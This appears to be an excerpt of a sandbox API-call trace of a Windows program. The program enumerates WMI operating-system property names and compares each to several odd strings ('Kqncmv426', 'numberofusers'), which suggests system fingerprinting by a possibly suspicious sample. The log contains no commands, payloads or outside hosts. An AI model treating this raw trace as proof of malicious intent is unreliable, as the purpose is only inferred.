[0044.375] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.375] IWbemClassObject:Get (in: This=0x223c888, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="FreeVirtualMemory", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.375] IWbemClassObject:Get (in: This=0x223c888, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="FreeVirtualMemory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="InstallDate", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.376] lstrlenW (lpString="InstallDate") returned 11
[0044.376] lstrlenW (lpString="Kqncmv426") returned 9
[0044.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="InstallDate", cchCount2=11) returned 3
[0044.376] lstrlenW (lpString="InstallDate") returned 11
[0044.376] lstrlenW (lpString="lgiet286a") returned 9
[0044.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="InstallDate", cchCount2=11) returned 3
[0044.376] lstrlenW (lpString="InstallDate") returned 11
[0044.376] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="InstallDate", cchCount2=11) returned 3
[0044.376] lstrlenW (lpString="InstallDate") returned 11
[0044.376] lstrlenW (lpString="numberofusers") returned 13
[0044.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="InstallDate", cchCount2=11) returned 3
[0044.376] IUnknown:Release (This=0x223c888) returned 0x1
[0044.376] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.376] IWbemClassObject:Get (in: This=0x223ca20, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="LastBootUpTime", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.376] IWbemClassObject:Get (in: This=0x223ca20, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="InstallDate", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="LastBootUpTime", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.376] lstrlenW (lpString="LastBootUpTime") returned 14
[0044.376] lstrlenW (lpString="Kqncmv426") returned 9
[0044.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="LastBootUpTime", cchCount2=14) returned 1
[0044.376] lstrlenW (lpString="LastBootUpTime") returned 14
[0044.376] lstrlenW (lpString="lgiet286a") returned 9
[0044.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="LastBootUpTime", cchCount2=14) returned 3
[0044.376] lstrlenW (lpString="LastBootUpTime") returned 14
[0044.376] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.376] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="LastBootUpTime", cchCount2=14) returned 3
[0044.376] lstrlenW (lpString="LastBootUpTime") returned 14
[0044.376] lstrlenW (lpString="numberofusers") returned 13
[0044.377] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="LastBootUpTime", cchCount2=14) returned 3
[0044.377] IUnknown:Release (This=0x223ca20) returned 0x1
[0044.377] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.377] IWbemClassObject:Get (in: This=0x223cbb8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="LastBootUpTime", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="LocalDateTime", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.377] IWbemClassObject:Get (in: This=0x223cbb8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="LastBootUpTime", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="LocalDateTime", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.377] lstrlenW (lpString="LocalDateTime") returned 13
[0044.377] lstrlenW (lpString="Kqncmv426") returned 9
[0044.377] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="LocalDateTime", cchCount2=13) returned 1
[0044.377] lstrlenW (lpString="LocalDateTime") returned 13
[0044.377] lstrlenW (lpString="lgiet286a") returned 9
[0044.377] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="LocalDateTime", cchCount2=13) returned 1
[0044.377] lstrlenW (lpString="LocalDateTime") returned 13
[0044.377] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.377] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="LocalDateTime", cchCount2=13) returned 3
[0044.377] lstrlenW (lpString="LocalDateTime") returned 13
[0044.377] lstrlenW (lpString="numberofusers") returned 13
[0044.377] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="LocalDateTime", cchCount2=13) returned 3
[0044.377] IUnknown:Release (This=0x223cbb8) returned 0x1
[0044.377] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.377] IWbemClassObject:Get (in: This=0x223cd50, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="LocalDateTime", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Locale", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.377] IWbemClassObject:Get (in: This=0x223cd50, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="LocalDateTime", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Locale", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.378] lstrlenW (lpString="Locale") returned 6
[0044.378] lstrlenW (lpString="Kqncmv426") returned 9
[0044.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="Locale", cchCount2=6) returned 1
[0044.378] lstrlenW (lpString="Locale") returned 6
[0044.378] lstrlenW (lpString="lgiet286a") returned 9
[0044.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="Locale", cchCount2=6) returned 1
[0044.378] lstrlenW (lpString="Locale") returned 6
[0044.378] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="Locale", cchCount2=6) returned 3
[0044.378] lstrlenW (lpString="Locale") returned 6
[0044.378] lstrlenW (lpString="numberofusers") returned 13
[0044.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="Locale", cchCount2=6) returned 3
[0044.378] IUnknown:Release (This=0x223cd50) returned 0x1
[0044.378] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.378] IWbemClassObject:Get (in: This=0x223cee8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Locale", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Manufacturer", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.378] IWbemClassObject:Get (in: This=0x223cee8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Locale", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Manufacturer", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.378] lstrlenW (lpString="Manufacturer") returned 12
[0044.378] lstrlenW (lpString="Kqncmv426") returned 9
[0044.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="Manufacturer", cchCount2=12) returned 1
[0044.378] lstrlenW (lpString="Manufacturer") returned 12
[0044.378] lstrlenW (lpString="lgiet286a") returned 9
[0044.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="Manufacturer", cchCount2=12) returned 1
[0044.378] lstrlenW (lpString="Manufacturer") returned 12
[0044.378] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="Manufacturer", cchCount2=12) returned 3
[0044.379] lstrlenW (lpString="Manufacturer") returned 12
[0044.379] lstrlenW (lpString="numberofusers") returned 13
[0044.379] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="Manufacturer", cchCount2=12) returned 3
[0044.379] IUnknown:Release (This=0x223cee8) returned 0x1
[0044.379] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.379] IWbemClassObject:Get (in: This=0x223d080, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Manufacturer", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="MaxNumberOfProcesses", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.379] IWbemClassObject:Get (in: This=0x223d080, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Manufacturer", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="MaxNumberOfProcesses", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.379] lstrlenW (lpString="MaxNumberOfProcesses") returned 20
[0044.379] lstrlenW (lpString="Kqncmv426") returned 9
[0044.379] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="MaxNumberOfProcesses", cchCount2=20) returned 1
[0044.379] lstrlenW (lpString="MaxNumberOfProcesses") returned 20
[0044.379] lstrlenW (lpString="lgiet286a") returned 9
[0044.379] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="MaxNumberOfProcesses", cchCount2=20) returned 1
[0044.379] lstrlenW (lpString="MaxNumberOfProcesses") returned 20
[0044.379] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.379] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="MaxNumberOfProcesses", cchCount2=20) returned 3
[0044.379] lstrlenW (lpString="MaxNumberOfProcesses") returned 20
[0044.379] lstrlenW (lpString="numberofusers") returned 13
[0044.379] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="MaxNumberOfProcesses", cchCount2=20) returned 3
[0044.379] IUnknown:Release (This=0x223d080) returned 0x1
[0044.379] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.379] IWbemClassObject:Get (in: This=0x223d218, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="MaxNumberOfProcesses", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="MaxProcessMemorySize", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.379] IWbemClassObject:Get (in: This=0x223d218, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="MaxNumberOfProcesses", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="MaxProcessMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.380] lstrlenW (lpString="MaxProcessMemorySize") returned 20
[0044.380] lstrlenW (lpString="Kqncmv426") returned 9
[0044.380] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="MaxProcessMemorySize", cchCount2=20) returned 1
[0044.380] lstrlenW (lpString="MaxProcessMemorySize") returned 20
[0044.380] lstrlenW (lpString="lgiet286a") returned 9
[0044.380] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="MaxProcessMemorySize", cchCount2=20) returned 1
[0044.380] lstrlenW (lpString="MaxProcessMemorySize") returned 20
[0044.380] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.380] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="MaxProcessMemorySize", cchCount2=20) returned 3
[0044.380] lstrlenW (lpString="MaxProcessMemorySize") returned 20
[0044.380] lstrlenW (lpString="numberofusers") returned 13
[0044.380] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="MaxProcessMemorySize", cchCount2=20) returned 3
[0044.380] IUnknown:Release (This=0x223d218) returned 0x1
[0044.380] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.380] IWbemClassObject:Get (in: This=0x223d3b0, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="MaxProcessMemorySize", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.380] IWbemClassObject:Get (in: This=0x223d3b0, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="MaxProcessMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Name", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.380] lstrlenW (lpString="Name") returned 4
[0044.380] lstrlenW (lpString="Kqncmv426") returned 9
[0044.380] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="Name", cchCount2=4) returned 1
[0044.380] lstrlenW (lpString="Name") returned 4
[0044.380] lstrlenW (lpString="lgiet286a") returned 9
[0044.381] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="Name", cchCount2=4) returned 1
[0044.381] lstrlenW (lpString="Name") returned 4
[0044.381] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.381] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="Name", cchCount2=4) returned 3
[0044.381] lstrlenW (lpString="Name") returned 4
[0044.381] lstrlenW (lpString="numberofusers") returned 13
[0044.381] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="Name", cchCount2=4) returned 3
[0044.381] IUnknown:Release (This=0x223d3b0) returned 0x1
[0044.381] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.381] IWbemClassObject:Get (in: This=0x223d548, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfLicensedUsers", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.381] IWbemClassObject:Get (in: This=0x223d548, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Name", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="NumberOfLicensedUsers", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.381] lstrlenW (lpString="NumberOfLicensedUsers") returned 21
[0044.381] lstrlenW (lpString="Kqncmv426") returned 9
[0044.381] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="NumberOfLicensedUsers", cchCount2=21) returned 1
[0044.381] lstrlenW (lpString="NumberOfLicensedUsers") returned 21
[0044.381] lstrlenW (lpString="lgiet286a") returned 9
[0044.381] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="NumberOfLicensedUsers", cchCount2=21) returned 1
[0044.381] lstrlenW (lpString="NumberOfLicensedUsers") returned 21
[0044.381] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.381] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="NumberOfLicensedUsers", cchCount2=21) returned 3
[0044.381] lstrlenW (lpString="NumberOfLicensedUsers") returned 21
[0044.381] lstrlenW (lpString="numberofusers") returned 13
[0044.382] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="NumberOfLicensedUsers", cchCount2=21) returned 3
[0044.382] IUnknown:Release (This=0x223d548) returned 0x1
[0044.382] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.382] IWbemClassObject:Get (in: This=0x223d6e0, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfLicensedUsers", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfProcesses", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.382] IWbemClassObject:Get (in: This=0x223d6e0, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="NumberOfLicensedUsers", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="NumberOfProcesses", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.382] lstrlenW (lpString="NumberOfProcesses") returned 17
[0044.382] lstrlenW (lpString="Kqncmv426") returned 9
[0044.382] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="NumberOfProcesses", cchCount2=17) returned 1
[0044.382] lstrlenW (lpString="NumberOfProcesses") returned 17
[0044.382] lstrlenW (lpString="lgiet286a") returned 9
[0044.382] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="NumberOfProcesses", cchCount2=17) returned 1
[0044.382] lstrlenW (lpString="NumberOfProcesses") returned 17
[0044.382] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.382] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="NumberOfProcesses", cchCount2=17) returned 3
[0044.382] lstrlenW (lpString="NumberOfProcesses") returned 17
[0044.382] lstrlenW (lpString="numberofusers") returned 13
[0044.382] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="NumberOfProcesses", cchCount2=17) returned 3
[0044.382] IUnknown:Release (This=0x223d6e0) returned 0x1
[0044.382] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.383] IWbemClassObject:Get (in: This=0x223d878, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfProcesses", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfUsers", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.383] IWbemClassObject:Get (in: This=0x223d878, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="NumberOfProcesses", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="NumberOfUsers", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.383] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.383] lstrlenW (lpString="Kqncmv426") returned 9
[0044.383] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="NumberOfUsers", cchCount2=13) returned 1
[0044.383] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.383] lstrlenW (lpString="lgiet286a") returned 9
[0044.383] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="NumberOfUsers", cchCount2=13) returned 1
[0044.383] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.383] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.383] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="NumberOfUsers", cchCount2=13) returned 3
[0044.383] lstrlenW (lpString="NumberOfUsers") returned 13
[0044.383] lstrlenW (lpString="numberofusers") returned 13
[0044.383] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="NumberOfUsers", cchCount2=13) returned 2
[0044.383] GetCurrentThreadId () returned 0x9a8
[0044.383] ??0CHString@@QAE@XZ () returned 0x12f85c
[0044.383] IWbemClassObject:Get (in: This=0x223d878, wszName="Description", lFlags=0, pVal=0x12f82c*(varType=0x0, wReserved1=0x7570, wReserved2=0x93a9, wReserved3=0x4de8, varVal1=0x0, varVal2=0x18f0c8), pType=0x0, plFlavor=0x0 | out: pVal=0x12f82c*(varType=0x8, wReserved1=0x7570, wReserved2=0x93a9, wReserved3=0x4de8, varVal1="Number of user sessions for which the operating system is currently storing state information", varVal2=0x18f0c8), pType=0x0, plFlavor=0x0) returned 0x0
[0044.383] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.383] lstrlenA (lpString="") returned 0
[0044.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8926a2, cbMultiByte=-1, lpWideCharStr=0x17d2f18, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0044.384] SysStringLen (param_1="Number of user sessions for which the operating system is currently storing state information") returned 0x5d
[0044.384] SysStringLen (param_1="") returned 0x0
[0044.384] GetCurrentThreadId () returned 0x9a8
[0044.384] ??0CHString@@QAE@XZ () returned 0x12f864
[0044.384] IWbemClassObject:Get (in: This=0x223d878, wszName="Qualifiers", lFlags=0, pVal=0x12f7e8*(varType=0x0, wReserved1=0x0, wReserved2=0x98cd, wReserved3=0x7570, varVal1=0x180000, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f7e8*(varType=0x1, wReserved1=0x0, wReserved2=0x98cd, wReserved3=0x7570, varVal1=0x180000, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0044.384] ??1CHString@@QAE@XZ () returned 0x6f900504
[0044.384] IUnknown:Release (This=0x223d878) returned 0x1
[0044.384] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.384] IWbemClassObject:Get (in: This=0x223da10, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x24dcdc, varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Organization", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.385] IWbemClassObject:Get (in: This=0x223da10, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x0, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1=0x24dd04, varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Organization", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.385] lstrlenW (lpString="Organization") returned 12
[0044.385] lstrlenW (lpString="Kqncmv426") returned 9
[0044.385] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="Organization", cchCount2=12) returned 1
[0044.385] lstrlenW (lpString="Organization") returned 12
[0044.385] lstrlenW (lpString="lgiet286a") returned 9
[0044.385] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="Organization", cchCount2=12) returned 1
[0044.385] lstrlenW (lpString="Organization") returned 12
[0044.385] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.385] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="Organization", cchCount2=12) returned 3
[0044.385] lstrlenW (lpString="Organization") returned 12
[0044.385] lstrlenW (lpString="numberofusers") returned 13
[0044.385] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="Organization", cchCount2=12) returned 1
[0044.385] IUnknown:Release (This=0x223da10) returned 0x1
[0044.385] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
